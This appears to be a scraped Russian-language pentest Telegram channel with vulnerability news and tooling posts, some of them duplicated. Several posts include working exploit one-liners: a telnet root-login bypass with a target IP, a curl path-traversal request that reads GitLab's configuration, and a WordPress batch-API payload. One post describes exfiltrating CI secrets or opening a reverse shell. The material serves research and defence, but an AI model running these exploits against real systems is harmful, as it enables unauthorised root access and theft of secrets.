Forwarded from вольтаж
взломать интернет бесплатно 2026
вот эта штука сверху, которой уже назначен CVE-2026-24061, дает подключиться по telnet сразу как root, без пароля.
что?🐱
Давным давно в 2015 году, почему-то в нашей мировой линии, telnet был неуязвим, но в нём не работал автологин если на машине нет Kerberos.
Суть автологина - автоматически передать юзернейм для логина. Как когда по ssh коннектишься не указав логин, машина автоматически коннектится с именем текущего юзера.
Без Kerberos, этот юзернейм попросту не детектился.
Поэтому разработчики обновили шаблон логина, добавив динамический аргумент %U, что как раз подставляет юзернейм.
Новый шаблон:
и вот тут происходит кабум бабах ракета взрыв🤯
1. В бинаре
2. По RFC 1572, подключаясь по telnet, ты можешь сдать переменные окружения, в том числе
3. содержимое
. . .
Теперь перечитай эксплойт
Да это же уязвимость наargument injection!
Повторим флоу атаки🃏
0. выставляем переменную
1. переменная
2.
3. сервер получает команду
4. бинарь
5. поздравляю,
Dockerfile для тестовой лабы
Если хочешь кишки кода и ветви логики, то читай этот подробный ресерч
USER="-f root" telnet -a 104.16.149.244 23
вот эта штука сверху, которой уже назначен CVE-2026-24061, дает подключиться по telnet сразу как root, без пароля.
что?
Давным давно в 2015 году, почему-то в нашей мировой линии, telnet был неуязвим, но в нём не работал автологин если на машине нет Kerberos.
Суть автологина - автоматически передать юзернейм для логина. Как когда по ssh коннектишься не указав логин, машина автоматически коннектится с именем текущего юзера.
Без Kerberos, этот юзернейм попросту не детектился.
Поэтому разработчики обновили шаблон логина, добавив динамический аргумент %U, что как раз подставляет юзернейм.
Новый шаблон:
/usr/bin/login " -p -h %h %?u{-f %u}{%U}"и вот тут происходит кабум бабах ракета взрыв
1. В бинаре
login есть флаг -f, нужный для "этот юзер уже был аутентифицирован где-то ещё, не надо его проверять снова"2. По RFC 1572, подключаясь по telnet, ты можешь сдать переменные окружения, в том числе
$USER с целевым логином3. содержимое
$USER переменной никак не санитизируется. . .
Теперь перечитай эксплойт
USER="-f root" telnet -a 104.16.149.244 23
Да это же уязвимость на
Повторим флоу атаки
0. выставляем переменную
$USER="-f root" и включаем автологин -a1. переменная
$USER не проверяется, но учитывается сервером2.
$USER подставляется в шаблон логина вместо {%U}3. сервер получает команду
/usr/bin/login -p -f root4. бинарь
login скипает аутентификацию из-за -f5. поздравляю,
ты root
———Dockerfile для тестовой лабы
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
COPY docker-entrypoint.sh /docker-entrypoint.sh
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]
Если хочешь кишки кода и ветви логики, то читай этот подробный ресерч
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥29❤7🗿5❤🔥2🥰2
Мне тут доложили, что hh.ru вышел в паблик на Standoff Bug Bounty
Интересно, примут ли мой отчёт, если у меня нет 15 лет опыта bug bounty и миллиона сертификатов🔍
💫 @pentestnotes
Интересно, примут ли мой отчёт, если у меня нет 15 лет опыта bug bounty и миллиона сертификатов
Please open Telegram to view this post
VIEW IN TELEGRAM
1😁45🌚6❤3🤷♂2🥰2🗿1
DeBix (Деобфускатор Bitrix)
🔍 Вы знали, что модули Bitrix, поставляемые через Marketplace в демо-режиме, проходят через автоматический обфускатор? (см. Фото)
Встроенный обфускатор переименовывает параметры функций и члены классов в файлах по типу include.php и install.php, что зачастую приводит к ошибкам в работе легитимного кода. Помимо этого, похожий обфусцировонный код встречается и при разборе инцидентов.
Чтобы не тратить часы на ручной разбор base64_decode и переменных вида $__254446073, я собрал DeBix (Deobfuscator Bitrix) — утилиту для восстановления читаемости кода.
Репозиторий проекта:
https://github.com/FaLLenSkiLL1/DeBix
💫 @pentestnotes
Встроенный обфускатор переименовывает параметры функций и члены классов в файлах по типу include.php и install.php, что зачастую приводит к ошибкам в работе легитимного кода. Помимо этого, похожий обфусцировонный код встречается и при разборе инцидентов.
Чтобы не тратить часы на ручной разбор base64_decode и переменных вида $__254446073, я собрал DeBix (Deobfuscator Bitrix) — утилиту для восстановления читаемости кода.
Репозиторий проекта:
https://github.com/FaLLenSkiLL1/DeBix
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤33🔥17😁3👍2👾2👎1
Наткнулся на, пожалуй, самый объемный гайд по безопасности JWT в рунете.
Автор канала Пингискок ультанул и выпустил цикл из 20 статей на ~25000 слов (это очень много буков)! Где разобрал JWT буквально побайтово🤩
Список статей:
1. Почему JWT сломан by design
2. Анатомия токена
3. alg:none - одна строчка и ты admin
4. Algorithm Confusion - публичный ключ как пароль
5. kid injection - SQLi через заголовок токена
6. jku/x5u/jwk/x5c - весь заголовок это attack surface
7. Брутфорс секретов на GPU - 150 млн HS256/сек
8. Psychic Signatures - нулевая подпись на Java 15-18
9. Криптография JWT для хакеров - ECDSA, RSA-PSS, EdDSA и где ломается математика
10. JWE — зашифрованные токены, Bleichenbacher, Invalid Curve, PBES2 DoS
11. JWT-библиотеки — рейтинг дырявости, Top 5 CVE, fingerprinting по токену
12. JWT в OAuth 2.0 и OIDC — token confusion, cross-service relay, ALBeast, DPoP bypass
13. XSS + JWT — кража токенов из localStorage, sessionStorage, cookies
14. Продвинутые криптоатаки — lattice, side-channels, fault injection
15. Инструменты - jwt_tool, hashcat, Burp JWT Editor
16. Методология
17. Hardcoded secrets — CVE-2025-20188 (CVSS 10.0), 17% JWT CVE за 2024-2026, где искать секреты
18. Что вместо JWT - PASETO, Macaroons, opaque tokens, server-side sessions
19. RFC 8725 - чеклист из 15 правил, который никто не читает
20. Постквантовый JWT - ML-DSA подписи по 2.4 KB, SD-JWT, Harvest Now Decrypt Later
💫 @pentestnotes
Автор канала Пингискок ультанул и выпустил цикл из 20 статей на ~25000 слов (это очень много буков)! Где разобрал JWT буквально побайтово
Список статей:
1. Почему JWT сломан by design
2. Анатомия токена
3. alg:none - одна строчка и ты admin
4. Algorithm Confusion - публичный ключ как пароль
5. kid injection - SQLi через заголовок токена
6. jku/x5u/jwk/x5c - весь заголовок это attack surface
7. Брутфорс секретов на GPU - 150 млн HS256/сек
8. Psychic Signatures - нулевая подпись на Java 15-18
9. Криптография JWT для хакеров - ECDSA, RSA-PSS, EdDSA и где ломается математика
10. JWE — зашифрованные токены, Bleichenbacher, Invalid Curve, PBES2 DoS
11. JWT-библиотеки — рейтинг дырявости, Top 5 CVE, fingerprinting по токену
12. JWT в OAuth 2.0 и OIDC — token confusion, cross-service relay, ALBeast, DPoP bypass
13. XSS + JWT — кража токенов из localStorage, sessionStorage, cookies
14. Продвинутые криптоатаки — lattice, side-channels, fault injection
15. Инструменты - jwt_tool, hashcat, Burp JWT Editor
16. Методология
17. Hardcoded secrets — CVE-2025-20188 (CVSS 10.0), 17% JWT CVE за 2024-2026, где искать секреты
18. Что вместо JWT - PASETO, Macaroons, opaque tokens, server-side sessions
19. RFC 8725 - чеклист из 15 правил, который никто не читает
20. Постквантовый JWT - ML-DSA подписи по 2.4 KB, SD-JWT, Harvest Now Decrypt Later
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥32👍5❤3🫡2🤔1
XSSNow - Крутой генератор XSS пейлоадов и одновременно с этим еще и XSS Payload Database🍪
Предлагает порядка нескольких тысяч готовых XSS‑payload’ов, разбитых по контекстам и вариантам инъекций (DOM‑based, reflected, stored, CSP‑bypass и т.п.).
🟣 Умеет строить контекстно‑зависимые полезные нагрузки
🟣 Можно точечно настраивать свои payload'ы
🟣 Поддерживает различные WAF (bypass)
🟣 Использует различные кодировки и трансформации
🟣 Позиционируется как community продукт. Можно добавлять свои нагрузки
Github Репозиторий / Generator / Database
💫 @pentestnotes
Предлагает порядка нескольких тысяч готовых XSS‑payload’ов, разбитых по контекстам и вариантам инъекций (DOM‑based, reflected, stored, CSP‑bypass и т.п.).
Github Репозиторий / Generator / Database
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16🤯4❤2🔥2🤝2😱1
Meld-Encrypt: Шифрование файлов и заметок в Obsidian. 👊
Многие специалисты, включая меня, используют Obsidian для ведения своих заметок, в том числе очень даже чувствительных.
И вроде всё хорошо, obsidian удобен, НО! У него до сих пор нет встроенного шифрования и функций безопасности! А существующие плагины не такие классные, как хотелось бы.
Поэтому я сделал форк довольно популярного Obsidian Encrypt и добавил в него функционал, которого лично мне не хватало во время работы.
Что нового по сравнению с оригиналом:
➡️ Появилась поддержка шифрования файлов
➡️ Шифрование всего контента в заметке одним нажатием
➡️ Шифрование директорий
➡️ Удобный просмотр зашифрованного контента
➡️ Улучшенный UI/UX
➡️ Добавлена Русская локализация
➡️ Весь новый функционал также работает и на Android
➡️ Исправлены мелкие недочеты
➡️ Добавлено краткое руководство пользователя
🔒 Для шифрования используется связка PBKDF2 + AES-256-GCM. Главная фишка в том, что заметки всегда будут храниться на диске в зашифрованном виде. Это исключает компрометацию даже при физическом доступе к вашему устройству.
Ссылка на GitHub
💫 @pentestnotes
Многие специалисты, включая меня, используют Obsidian для ведения своих заметок, в том числе очень даже чувствительных.
И вроде всё хорошо, obsidian удобен, НО! У него до сих пор нет встроенного шифрования и функций безопасности! А существующие плагины не такие классные, как хотелось бы.
Поэтому я сделал форк довольно популярного Obsidian Encrypt и добавил в него функционал, которого лично мне не хватало во время работы.
Что нового по сравнению с оригиналом:
🔒 Для шифрования используется связка PBKDF2 + AES-256-GCM. Главная фишка в том, что заметки всегда будут храниться на диске в зашифрованном виде. Это исключает компрометацию даже при физическом доступе к вашему устройству.
Ссылка на GitHub
Please open Telegram to view this post
VIEW IN TELEGRAM
6🔥25👍4❤3🗿2👾2😁1
CVE-2026-31431
29 апреля была опубликована информация об уязвимости Copy Fail в ядре Linux с уровнем опасности 7.8 CVSS. Уязвимость позволяет локальному пользователю повысить права до root и затрагивает все Linux-дистрибутивы. PoC можно поискать тут.
Но интересно другое. Сегодня хостинг провайдеры стали массово рассылать письма счастья, что вообще-то все ваши VPS/VDS уязвимы и патча нет.
Примечательно, что начало рассылки совпало с взломом одного (все совпадения случайны) регионального хостинг провайдера, который предоставлял доступ всем клиентам к одной тачке с непривилегированными учетками формата user12345. Ну и кто-то из таких юзеров догадался подняться до Рута :)
Так что будьте бдительны и проверьте свои тачки! Для временного фикса нужно отключить автозагрузку модуля algif_aead:
💫 @pentestnotes
29 апреля была опубликована информация об уязвимости Copy Fail в ядре Linux с уровнем опасности 7.8 CVSS. Уязвимость позволяет локальному пользователю повысить права до root и затрагивает все Linux-дистрибутивы. PoC можно поискать тут.
Но интересно другое. Сегодня хостинг провайдеры стали массово рассылать письма счастья, что вообще-то все ваши VPS/VDS уязвимы и патча нет.
Примечательно, что начало рассылки совпало с взломом одного (все совпадения случайны) регионального хостинг провайдера, который предоставлял доступ всем клиентам к одной тачке с непривилегированными учетками формата user12345. Ну и кто-то из таких юзеров догадался подняться до Рута :)
Так что будьте бдительны и проверьте свои тачки! Для временного фикса нужно отключить автозагрузку модуля algif_aead:
sudo tee -a /etc/modprobe.d/blacklist-algif_aead.conf <<’EOF’
# CVE-2026-31431
blacklist algif_aead
install algif_aead /bin/false
EOF
sudo sh -c "lsmod | grep algif_aead -q && modprobe -r algif_aead || reboot"
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍6🤯4❤2😁2🫡2
🚨Обнаружена Уязвимость в модуле для CMS Bitrix «INTEC:Ядро» от разработчика "INTEC".
BDU пока нет, но судя по оперативной реакции, предположу что уязвимость Критическая.
Я не разработчик и наверное что-то не понимаю в безопасном написании кода, но возможно стоит на админских эндпоинтах использовать админскую проверку prolog_admin_before.php вместо обычной prolog_before.php.
(Bitrix-аутентификация администратора не проверяется. Скрипт контейнера сохраняется в БД и выполняется через eval() при рендере страницы.)
Уязвимый модуль установлен на более чем 1000 ресурсах.
Рекомендуют:
➡️ Восстановить резервную копию сайта от 27.04.2026 или более ранней даты.
➡️ Установить последние обновления (актуальная версия 1.2.30) модуля Intec.Core.
➡️ Обновить систему 1С-Битрикс до последней актуальной версии.
💫 @pentestnotes
BDU пока нет, но судя по оперативной реакции, предположу что уязвимость Критическая.
Я не разработчик и наверное что-то не понимаю в безопасном написании кода, но возможно стоит на админских эндпоинтах использовать админскую проверку prolog_admin_before.php вместо обычной prolog_before.php.
(Bitrix-аутентификация администратора не проверяется. Скрипт контейнера сохраняется в БД и выполняется через eval() при рендере страницы.)
Уязвимый модуль установлен на более чем 1000 ресурсах.
Рекомендуют:
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17😁8❤7🗿2
Помните знаменитый RCE Landing под Bitrix? Ну это та критическая уязвимость, которая была на более чем 100 000 российских ресурсах и PoC под которую до сих пор просят в профильных чатах...
Так вот. Теперь придётся просить 2 PoCа)
Local file inclusion при редактировании лендинга связана с неверным управлением именами файлов для PHP-функций include или require. Эксплуатация уязвимости может позволить нарушителю, действующему удалённо, выполнить произвольный код
Уязвимы все версии landing до 25.1100.100
BDU:2026-05965
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥27❤4😁3❤🔥2🗿2👍1
CVE-2024-6678 | GitLab: Pipeline Schedule Arbitrary User Trigger
В процессе написания нового ресерча, обнаружил, что для довольно интересной CVE под Gitlab - CVE-2024-6678 (9.9/10 CVSS) по какой-то причине всё ещё нет публичного PoC’a. Пришлось написать его самому🤷♀️
Теперь делюсь с вами, вдруг кому пригодится.
Суть уязвимости в том, что при определённых условиях злоумышленник может запускать пайплайны от имени любого пользователя. Это даёт возможность атакующему получить доступ к внутренним репозиториям и закрытым проектам, стащить креды и токены, и, как следствие - получить RCE. Уязвимость, кстати, не замечали целых десять лет (уязвимы версии CE/EE с 8.14 до 17.1.7, версии с 17.2 до 17.2.5 и версии с 17.3 до 17.3.2).
Цепочка:
➡️ Developer триггерит Pipeline Schedule, созданный Owner/Maintainer
➡️ Пайплайн стартует с всеми переменными расписания (DB_PASSWORD, SSH_PRIVATE_KEY, API-токены и т.д.)
➡️ Если у атакующего есть push-возможности (Developer обычно имеет), он подменяет
➡️ GitLab Runner исполняет этот пайплайн с полным доступом к секретам и окружению
➡️ PoC⬅️
💫 @pentestnotes
В процессе написания нового ресерча, обнаружил, что для довольно интересной CVE под Gitlab - CVE-2024-6678 (9.9/10 CVSS) по какой-то причине всё ещё нет публичного PoC’a. Пришлось написать его самому
Теперь делюсь с вами, вдруг кому пригодится.
Суть уязвимости в том, что при определённых условиях злоумышленник может запускать пайплайны от имени любого пользователя. Это даёт возможность атакующему получить доступ к внутренним репозиториям и закрытым проектам, стащить креды и токены, и, как следствие - получить RCE. Уязвимость, кстати, не замечали целых десять лет (уязвимы версии CE/EE с 8.14 до 17.1.7, версии с 17.2 до 17.2.5 и версии с 17.3 до 17.3.2).
Цепочка:
.gitlab-ci.yml в незащищённой ветке (develop/staging) - добавляет туда отправку env на свой сервер или реверс-шеллPlease open Telegram to view this post
VIEW IN TELEGRAM
❤17👍11🔥5❤🔥2😱1
Forwarded from Standoff 365
Регистрация на Standoff Talks открыта 😏
Без лишних слов — переходи на сайт. Там уже готова программа для комьюнити на 18 и 19 июня.
Тебя ждут доклады профи (спасибо всем, кто их прислал), мастер-классы, конкурсы и, конечно же, возможность увидеть кибербитву своими глазами⚱️
Будет насыщенно, захватывающе и очень по-летнему!
Поторопись, чтобы забрать проходку себе: места заканчиваются быстрее, чем пиво на афтепати🥰
➡ ️ Зарегистрироваться на главную кибертусовку лета 👈
P. S. Кибербитва гремит все четыре дня, но первые два — время бизнес-программы. А вот 18–19 июня — основной движ. Пригоняй🔥
Без лишних слов — переходи на сайт. Там уже готова программа для комьюнити на 18 и 19 июня.
Тебя ждут доклады профи (спасибо всем, кто их прислал), мастер-классы, конкурсы и, конечно же, возможность увидеть кибербитву своими глазами
Будет насыщенно, захватывающе и очень по-летнему!
Поторопись, чтобы забрать проходку себе: места заканчиваются быстрее, чем пиво на афтепати
P. S. Кибербитва гремит все четыре дня, но первые два — время бизнес-программы. А вот 18–19 июня — основной движ. Пригоняй
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6👍4👾2
Standoff Hacks 🎹
552 отправленных отчета. Почти 8 млн ₽ выплат исследователям. 37 топовых багхантеров
💫 @pentestnotes
552 отправленных отчета. Почти 8 млн ₽ выплат исследователям. 37 топовых багхантеров
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥15👎5❤4😁1😐1
Forwarded from Крак%00зябры
BDU:2026-08077 - уязвимость связана с механизмом обработки формул в профилях импорта: значение формулы, заданное для импортируемого поля, интерпретируется как исполняемый код.
Настройка формулы требует прав на редактирование профиля, то есть реалистичен сценарий эксплуатации с правами низкопривилегированного контент-менеджера, без полных административных привилегий.
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥13👍3❤2👎1
Forwarded from HaHacking
6.9.0 – 6.9.4 (2 декабря – 11 марта 2026)7.0.0 – 7.0.1 (20 мая – 9 июля 2026)6.8.0 – 6.8.5 (*только SQLi)CVE-2026-63030POST /wp-json/batch/v1 или POST /?rest_route=/batch/v1 — unauth метод, принимающий целый список подзапросов к API в виде JSON, прим.:{
"requests": [
{
"path": "/wp/v2/posts"
},
{
"method": "POST",
"path": "/wp/v2/users/me"
}
]
}$matches + $validation;Если какой-то запрос не прошёл проверку**
wp_parse_url() — массивы $matches + $validation рассинхронизируются**Например, такой запрос:
GET http://:$match) + с методом, для которого хочется обойти валидацию;CVE-2026-60137GET /wp/v2/posts/<id> — метод, который после валидации передаёт свои параметры (author_exclude, orderby, per_page, ...) функции get_items();author_excludeWP_Query.author__not_in, который вставляется в SQL запрос;GET /wp/v2/posts/999999?author_exclude=<payload> [в составе batch-запроса] в обход проверок!➡ Почитать ещё:
▪️ ‟wp2shell: Pre Authentication RCE in WordPress Core”
▪️ ‟Exploit brokers pay $500,000 for a WordPress RCE. I found one with GPT5.6 Sol Ultra and $25”
▪️ ‟wp2shell hits WordPress: detecting pre-auth RCE from plugin drop to command execution”
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
32🔥7❤4🤔2👎1
Как-то незаметно нас стало 3000 😊
Отдельное спасибо тем, кто пишет в директ с вопросами, поправляет ошибки и присылает свои находки. Если бы не вы, то многих постов могло бы и не быть💜
Сейчас у меня в работе большой ресерч (по типу этого), а также планирую потихоньку восстанавливать темп публикаций моих заметок по пентесту
💫 @pentestnotes
Отдельное спасибо тем, кто пишет в директ с вопросами, поправляет ошибки и присылает свои находки. Если бы не вы, то многих постов могло бы и не быть
Сейчас у меня в работе большой ресерч (по типу этого), а также планирую потихоньку восстанавливать темп публикаций моих заметок по пентесту
Please open Telegram to view this post
VIEW IN TELEGRAM
2❤25🔥11🥰9
🚨 Уязвимость в модуле CMS Bitrix - «КОМТЕТ Касса Курьер»
Очередная уязвимость под CMS Bitrix связана с отсутствием аутентификации критичной функции стороннего модуля.
Проблема была в обработчике отчёта КОМТЕТ Кассы.🙂
Это можно понять, посмотрев на изменения в коде актуального релиза 2.8.0 от 12.08.2026, где разработчики внесли три изменения:
➡️ добавили проверку подписи входящего отчёта;
➡️ ограничили обработчик методом POST;
➡️ добавили логирование запросов в журнал событий для аудита.
Получается, критичный обработчик раньше мог быть вызван злоумышленником без каких либо проверок обычным GET запросом.
⚠️ Критичность: CVSS 3.1: 8.2 (High)
➡️ BDU:2026-10202
➡️ Затронуты все версии модуля до 2.8.1
На данный момент до ~500 ресурсов потенциально подвержены уязвимости.
💫 @pentestnotes
Очередная уязвимость под CMS Bitrix связана с отсутствием аутентификации критичной функции стороннего модуля.
Проблема была в обработчике отчёта КОМТЕТ Кассы.
Это можно понять, посмотрев на изменения в коде актуального релиза 2.8.0 от 12.08.2026, где разработчики внесли три изменения:
Получается, критичный обработчик раньше мог быть вызван злоумышленником без каких либо проверок обычным GET запросом.
На данный момент до ~500 ресурсов потенциально подвержены уязвимости.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤🔥2❤2👍1🥰1🤝1
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2026-19490 - Auth Bypass в Citrix NetScaler ADC / Gateway 🥤
Критическая уязвимость (CVSS 9.3), позволяющая неаутентифицированному атакующему полностью обойти аутентификацию. Уже активно эксплуатируется (PoC).
Работает на устройствах, настроенных как Gateway (SSL VPN, ICA Proxy, CVPN, RDP Proxy) или AAA Virtual Server. В более новых билдах дополнительно требуется наличие SAML Action.
Проблема заключается в обработке SAML HTTP-Redirect binding на эндпоинте /cgi/samlauth, благодаря чему можно отправить unsigned SAMLResponse и получить валидную сессию (NSC_AAAC / NSC_TASS).
Shodan - 34000 results
FOFA - 1500 results
Censys - 9600 results
💫 @pentestnotes
Критическая уязвимость (CVSS 9.3), позволяющая неаутентифицированному атакующему полностью обойти аутентификацию. Уже активно эксплуатируется (PoC).
Работает на устройствах, настроенных как Gateway (SSL VPN, ICA Proxy, CVPN, RDP Proxy) или AAA Virtual Server. В более новых билдах дополнительно требуется наличие SAML Action.
Проблема заключается в обработке SAML HTTP-Redirect binding на эндпоинте /cgi/samlauth, благодаря чему можно отправить unsigned SAMLResponse и получить валидную сессию (NSC_AAAC / NSC_TASS).
Shodan - 34000 results
FOFA - 1500 results
Censys - 9600 results
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤5👍1
CVSS 10.0
Критическая уязвимость Gitlab в функционале API коммитов. Неавторизованный пользователь может читать произвольные файлы с сервера через path traversal.
Проблема заключается в том, что API не ограничивает пути и не требует аутентификации. Достаточно одного публичного проекта на инстансе.
Уязвимы следующие версии:
18.7 → 19.1.7 включительно
19.2.0 → 19.2.5 включительно
19.3.0 → 19.3.1 включительно
Исправлено в:
19.1.8 / 19.2.6 / 19.3.2 (патч от 10 сентября)
Быстрая проверка:
curl -sk -X POST \
"https://TARGET/api/v4/projects/1/repository/%63ommits?file=&file.path=/var/opt/gitlab/gitlab-rails/etc/gitlab.yml&file.size=1&Content-Type=application/x-www-form-urlencoded"
Если хост уязвим - в ответе будет кусок содержимого файла внутри ошибки invalid %-encoding.
PoC уже есть в открытом доступе:
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥14👍4